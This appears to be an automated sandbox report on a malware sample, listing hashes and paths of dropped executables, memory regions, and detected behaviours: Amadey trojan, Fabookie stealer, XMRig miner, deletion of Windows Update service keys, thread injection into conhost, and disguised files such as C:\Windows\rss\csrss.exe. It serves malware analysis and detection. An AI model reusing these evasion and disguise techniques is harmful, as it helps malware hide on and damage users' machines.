MD5 a53b97f33623010a204d53ca814e8dd2
SHA1 1c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA256 6ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA512 6a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b

memory/476-175-0x0000000077660000-0x0000000077662000-memory.dmp

memory/476-176-0x0000000077660000-0x0000000077662000-memory.dmp

memory/476-178-0x0000000077670000-0x0000000077672000-memory.dmp

memory/476-177-0x0000000077670000-0x0000000077672000-memory.dmp

memory/476-179-0x0000000077670000-0x0000000077672000-memory.dmp

memory/476-181-0x000007FEFD3C0000-0x000007FEFD3C2000-memory.dmp

memory/476-182-0x000007FEFD3C0000-0x000007FEFD3C2000-memory.dmp

memory/476-184-0x000007FEFD3D0000-0x000007FEFD3D2000-memory.dmp

memory/476-185-0x000007FEFD3D0000-0x000007FEFD3D2000-memory.dmp

memory/476-186-0x000000013FC90000-0x0000000141459000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

MD5 33f958670b421823cb7ec4ba00d501fc
SHA1 2d7d4196f7018b2d52914e268b977c9578cf51a7
SHA256 3e37c392d7e94e4e166148b94684d2e741ca81fe7f7c63bcf046bcfe024446a9
SHA512 750b195db93508716ec6b40c01d0bb9b9b9e5b3bdbc5a8a32fcfd7ffca2a1b91822a4eb12268abe6f55d6a9bdf27bf79cf396a15dc2f14b42c4fdcfa0c559a44

\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

MD5 33f958670b421823cb7ec4ba00d501fc
SHA1 2d7d4196f7018b2d52914e268b977c9578cf51a7
SHA256 3e37c392d7e94e4e166148b94684d2e741ca81fe7f7c63bcf046bcfe024446a9
SHA512 750b195db93508716ec6b40c01d0bb9b9b9e5b3bdbc5a8a32fcfd7ffca2a1b91822a4eb12268abe6f55d6a9bdf27bf79cf396a15dc2f14b42c4fdcfa0c559a44

memory/1688-191-0x0000000004920000-0x0000000004960000-memory.dmp

memory/1688-192-0x0000000000320000-0x0000000000321000-memory.dmp

\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

memory/364-200-0x0000000002D80000-0x0000000002EB1000-memory.dmp

memory/1464-219-0x000000013FC90000-0x0000000141459000-memory.dmp

memory/1164-222-0x0000000000620000-0x0000000000662000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

memory/2024-233-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1276-232-0x0000000002940000-0x0000000002956000-memory.dmp

memory/1164-237-0x0000000000550000-0x000000000056C000-memory.dmp

memory/1164-239-0x0000000000550000-0x0000000000565000-memory.dmp

memory/1164-240-0x0000000000550000-0x0000000000565000-memory.dmp

memory/1164-242-0x0000000000550000-0x0000000000565000-memory.dmp

memory/1164-244-0x0000000000550000-0x0000000000565000-memory.dmp

\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

memory/1164-250-0x0000000000550000-0x0000000000565000-memory.dmp

\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

memory/1164-246-0x0000000000550000-0x0000000000565000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

MD5 33f958670b421823cb7ec4ba00d501fc
SHA1 2d7d4196f7018b2d52914e268b977c9578cf51a7
SHA256 3e37c392d7e94e4e166148b94684d2e741ca81fe7f7c63bcf046bcfe024446a9
SHA512 750b195db93508716ec6b40c01d0bb9b9b9e5b3bdbc5a8a32fcfd7ffca2a1b91822a4eb12268abe6f55d6a9bdf27bf79cf396a15dc2f14b42c4fdcfa0c559a44

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

MD5 33f958670b421823cb7ec4ba00d501fc
SHA1 2d7d4196f7018b2d52914e268b977c9578cf51a7
SHA256 3e37c392d7e94e4e166148b94684d2e741ca81fe7f7c63bcf046bcfe024446a9
SHA512 750b195db93508716ec6b40c01d0bb9b9b9e5b3bdbc5a8a32fcfd7ffca2a1b91822a4eb12268abe6f55d6a9bdf27bf79cf396a15dc2f14b42c4fdcfa0c559a44

memory/1164-274-0x00000000005B0000-0x00000000005B1000-memory.dmp

memory/1080-275-0x0000000002940000-0x000000000322B000-memory.dmp

memory/976-289-0x0000000000400000-0x0000000000426000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

memory/976-293-0x0000000004A70000-0x0000000004AB0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

memory/2032-297-0x0000000000330000-0x0000000000331000-memory.dmp

memory/2032-296-0x0000000002260000-0x00000000022A0000-memory.dmp

memory/552-353-0x0000000000430000-0x0000000000470000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

memory/1348-357-0x0000000000220000-0x0000000000229000-memory.dmp

\Windows\rss\csrss.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

C:\Windows\rss\csrss.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

\Windows\rss\csrss.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

memory/2068-373-0x000000001B180000-0x000000001B462000-memory.dmp

memory/2068-375-0x0000000002340000-0x00000000023C0000-memory.dmp

memory/2068-376-0x0000000002340000-0x00000000023C0000-memory.dmp

memory/2068-377-0x0000000002340000-0x00000000023C0000-memory.dmp

memory/2068-374-0x0000000002250000-0x0000000002258000-memory.dmp

memory/2068-378-0x0000000002340000-0x00000000023C0000-memory.dmp

memory/2032-379-0x00000000004D0000-0x0000000000512000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 af93e73f53e2ed2ffd39e12bade7826f
SHA1 6aff6bcf4cf5c7b7cd7f6bb4e65822de4f90d157
SHA256 331050797bb4f98ca1930e056d3885f5faf53f7acbd1ab2f6020aeadd03bb960
SHA512 97e89458f8aef60c7b124a7db611a3fbb9676a28620631c184180e043fb413a86acc46f4fe4a99fb24c6dd0555fd210094921f11d7b42e88e0339f523e6e8b4c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1WGOC7WE7GME9A29VIB6.temp

MD5 af93e73f53e2ed2ffd39e12bade7826f
SHA1 6aff6bcf4cf5c7b7cd7f6bb4e65822de4f90d157
SHA256 331050797bb4f98ca1930e056d3885f5faf53f7acbd1ab2f6020aeadd03bb960
SHA512 97e89458f8aef60c7b124a7db611a3fbb9676a28620631c184180e043fb413a86acc46f4fe4a99fb24c6dd0555fd210094921f11d7b42e88e0339f523e6e8b4c

memory/2352-416-0x000000001AF80000-0x000000001B262000-memory.dmp

memory/2352-417-0x00000000023A0000-0x00000000023A8000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

memory/2352-423-0x0000000002520000-0x00000000025A0000-memory.dmp

memory/2352-424-0x0000000002520000-0x00000000025A0000-memory.dmp

memory/2424-425-0x00000000048A0000-0x00000000048E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 af93e73f53e2ed2ffd39e12bade7826f
SHA1 6aff6bcf4cf5c7b7cd7f6bb4e65822de4f90d157
SHA256 331050797bb4f98ca1930e056d3885f5faf53f7acbd1ab2f6020aeadd03bb960
SHA512 97e89458f8aef60c7b124a7db611a3fbb9676a28620631c184180e043fb413a86acc46f4fe4a99fb24c6dd0555fd210094921f11d7b42e88e0339f523e6e8b4c

memory/2780-434-0x000000001B050000-0x000000001B332000-memory.dmp

memory/2780-435-0x00000000022D0000-0x00000000022D8000-memory.dmp

memory/2780-440-0x0000000002414000-0x0000000002417000-memory.dmp

memory/2780-441-0x000000000241B000-0x0000000002452000-memory.dmp

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 13aaafe14eb60d6a718230e82c671d57
SHA1 e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256 f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512 ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 13aaafe14eb60d6a718230e82c671d57
SHA1 e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256 f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512 ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 f0616fa8bc54ece07e3107057f74e4db
SHA1 b33995c4f9a004b7d806c4bb36040ee844781fca
SHA256 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
SHA512 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 5c399d34d8dc01741269ff1f1aca7554
SHA1 e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256 e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA512 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Program Files\Notepad\Chrome\updater.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

C:\Program Files\Notepad\Chrome\updater.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

\Program Files\Notepad\Chrome\updater.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

memory/2056-490-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2056-492-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 af93e73f53e2ed2ffd39e12bade7826f
SHA1 6aff6bcf4cf5c7b7cd7f6bb4e65822de4f90d157
SHA256 331050797bb4f98ca1930e056d3885f5faf53f7acbd1ab2f6020aeadd03bb960
SHA512 97e89458f8aef60c7b124a7db611a3fbb9676a28620631c184180e043fb413a86acc46f4fe4a99fb24c6dd0555fd210094921f11d7b42e88e0339f523e6e8b4c

memory/2256-498-0x000000001B060000-0x000000001B342000-memory.dmp

memory/2256-499-0x0000000002450000-0x0000000002458000-memory.dmp

memory/2256-500-0x0000000002750000-0x00000000027D0000-memory.dmp

memory/2256-501-0x0000000002750000-0x00000000027D0000-memory.dmp

memory/2256-502-0x0000000002750000-0x00000000027D0000-memory.dmp

memory/2256-503-0x000000000275B000-0x0000000002792000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 af93e73f53e2ed2ffd39e12bade7826f
SHA1 6aff6bcf4cf5c7b7cd7f6bb4e65822de4f90d157
SHA256 331050797bb4f98ca1930e056d3885f5faf53f7acbd1ab2f6020aeadd03bb960
SHA512 97e89458f8aef60c7b124a7db611a3fbb9676a28620631c184180e043fb413a86acc46f4fe4a99fb24c6dd0555fd210094921f11d7b42e88e0339f523e6e8b4c

memory/2032-514-0x000000001B010000-0x000000001B2F2000-memory.dmp

memory/2032-515-0x0000000002510000-0x0000000002590000-memory.dmp

memory/2032-517-0x0000000002510000-0x0000000002590000-memory.dmp

memory/2032-516-0x0000000002510000-0x0000000002590000-memory.dmp

memory/2032-518-0x0000000002510000-0x0000000002590000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 af93e73f53e2ed2ffd39e12bade7826f
SHA1 6aff6bcf4cf5c7b7cd7f6bb4e65822de4f90d157
SHA256 331050797bb4f98ca1930e056d3885f5faf53f7acbd1ab2f6020aeadd03bb960
SHA512 97e89458f8aef60c7b124a7db611a3fbb9676a28620631c184180e043fb413a86acc46f4fe4a99fb24c6dd0555fd210094921f11d7b42e88e0339f523e6e8b4c

memory/2744-526-0x000000001B0B0000-0x000000001B392000-memory.dmp

memory/2744-530-0x00000000026B0000-0x0000000002730000-memory.dmp

memory/2744-531-0x00000000026B4000-0x00000000026B7000-memory.dmp

memory/2744-532-0x00000000026BB000-0x00000000026F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

memory/2808-541-0x00000000025D0000-0x0000000002650000-memory.dmp

memory/2808-542-0x00000000025D0000-0x0000000002650000-memory.dmp

memory/2808-540-0x00000000025D0000-0x0000000002650000-memory.dmp

memory/2808-543-0x00000000025D0000-0x0000000002650000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

memory/2240-586-0x0000000001F50000-0x0000000001FD0000-memory.dmp

memory/2240-590-0x0000000001F54000-0x0000000001F57000-memory.dmp

memory/476-598-0x0000000002614000-0x0000000002617000-memory.dmp

memory/476-599-0x000000000261B000-0x0000000002652000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

MD5 f801950a962ddba14caaa44bf084b55c
SHA1 7cadc9076121297428442785536ba0df2d4ae996
SHA256 c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f
SHA512 4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

Analysis: behavioral2

Detonation Overview

Submitted

2023-06-26 01:01

Reported

2023-06-26 01:03

Platform

win10v2004-20230621-en

Max time kernel

155s

Max time network

154s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Modifies security service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo C:\Windows\System32\reg.exe N/A

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\oldplayer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 704 set thread context of 2624 N/A C:\Program Files\Notepad\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 704 set thread context of 4296 N/A C:\Program Files\Notepad\Chrome\updater.exe C:\Windows\System32\conhost.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Notepad\Chrome\updater.exe N/A
